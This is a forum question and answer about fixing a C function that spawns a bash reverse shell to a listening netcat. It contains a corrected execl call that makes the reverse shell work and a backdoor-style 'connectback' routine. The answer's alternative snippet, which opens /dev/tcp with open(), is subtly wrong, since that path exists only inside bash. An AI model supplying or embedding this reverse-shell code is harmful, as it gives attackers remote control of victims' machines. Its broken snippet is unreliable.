Sending bash connectback issues in C

Question

So I can't seem to figure out what's going on. Every time this function executes, it opens a shell within my current application. It's supposed to be sending a shell to the listening netcat

I figured the solution would be forking, but I'm getting the same results.

void cmd_bashcb(char *ip, int port) {

    if (port > 0 && port < 65536) {

        if (fork() == 0) {
            //char *args[] = {"/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", NULL };
            //execv("/bin/bash", args);
            execl("/bin/bash", "/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", NULL);
        }
    }
}

Really one of those issues I can't seem to figure out

if I execute this CLI, it works like a charm bash -i >& /dev/tcp/IP/PORT 0>&1

Any ideas guys?

Answer 1

The first argument to execl() is the pathname of the executable. The second argument is the argv[0]. You are telling bash that its name is "/bin/bash -i >&…", and since there are no other arguments, it runs as a regular interactive shell connected to the standard I/O channels of the process your code is in.

You need:

execl("/bin/bash", "/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", (char *)0);

This effectively invokes:

/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

You need the extra level of shell to make the shell handle the I/O redirection. You could do it yourself and save a shell invocation.

int fd = open("/dev/tcp/127.0.0.1/4444", O_RDWR);
dup2(fd, STDIN_FILENO);
dup2(fd, STDOUT_FILENO);
dup2(fd, STDERR_FILENO);
close(fd);
execl("/bin/bash", "/bin/bash", "-i", (char *)0);